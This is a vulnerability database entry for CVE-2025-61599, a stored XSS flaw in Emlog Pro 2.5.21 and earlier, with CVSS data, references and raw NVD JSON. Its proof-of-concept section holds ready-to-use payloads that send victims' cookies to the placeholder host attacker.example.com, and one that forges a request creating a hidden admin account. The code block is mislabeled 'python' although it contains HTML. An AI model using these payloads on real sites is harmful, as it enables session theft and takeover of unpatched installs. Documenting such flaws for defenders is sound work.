CVE-2025-61599

Description

Emlog is an open source website building system. A stored Cross-Site Scripting (XSS) vulnerability exists in the "Twitter"feature of EMLOG Pro 2.5.21 and below. An authenticated user with privileges to post a "Twitter" message can inject arbitrary JavaScript code. The malicious script is stored on the server and gets executed in the browser of any user, including administrators, when they click on the malicious post to view it. This issue does not currently have a fix.

CVSS Details

CVSS Score

5.4

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:emlog:emlog:*:*:*:*:pro:*:*:* - VULNERABLE

Emlog Pro <= 2.5.21

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<!-- CVE-2025-61599 - Emlog Pro Stored XSS via Twitter Feature -->
<!-- Step 1: Login as an authenticated user with Twitter posting privileges -->
<!-- Step 2: Navigate to the Twitter/Tweet posting page -->
<!-- Step 3: Submit the following payload as tweet content -->

<!-- Payload 1: Basic cookie stealing via img onerror -->
<img src=x onerror="fetch('https://attacker.example.com/steal?cookie='+encodeURIComponent(document.cookie))">

<!-- Payload 2: Using script tag directly -->
<script>
  var img = new Image();
  img.src = 'https://attacker.example.com/steal?cookie=' + encodeURIComponent(document.cookie);
</script>

<!-- Payload 3: SVG-based XSS payload -->
<svg onload="fetch('https://attacker.example.com/steal?cookie='+encodeURIComponent(document.cookie))">

<!-- Payload 4: Admin privilege escalation - create a new admin account via CSRF -->
<script>
  fetch('/admin/user.php?action=add', {
    method: 'POST',
    headers: {'Content-Type': 'application/x-www-form-urlencoded'},
    body: 'username=hacker&password=hacked123&role=admin'
  });
</script>

<!-- Step 4: Wait for an administrator or other users to view the malicious tweet -->
<!-- Step 5: The malicious JavaScript executes in the victim's browser context -->

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-61599
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-61599
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-61599/
[4] VulDB https://vuldb.com/cve/CVE-2025-61599
[5] https://github.com/emlog/emlog/security/advisories/GHSA-rm5c-mjpg-vm89

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-61599", "sourceIdentifier": "[email protected]", "published": "2025-10-03T07:15:45.853", "lastModified": "2025-10-08T15:26:35.920", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Emlog is an open source website building system. A stored Cross-Site Scripting (XSS) vulnerability exists in the \"Twitter\"feature of EMLOG Pro 2.5.21 and below. An authenticated user with privileges to post a \"Twitter\" message can inject arbitrary JavaScript code. The malicious script is stored on the server and gets executed in the browser of any user, including administrators, when they click on the malicious post to view it. This issue does not currently have a fix."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:emlog:emlog:*:*:*:*:pro:*:*:*", "versionEndIncluding": "2.5.21", "matchCriteriaId": "ED1FB900-50A1-4B66-88DE-F3FB76B77C09"}]}]}], "references": [{"url": "https://github.com/emlog/emlog/security/advisories/GHSA-rm5c-mjpg-vm89", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}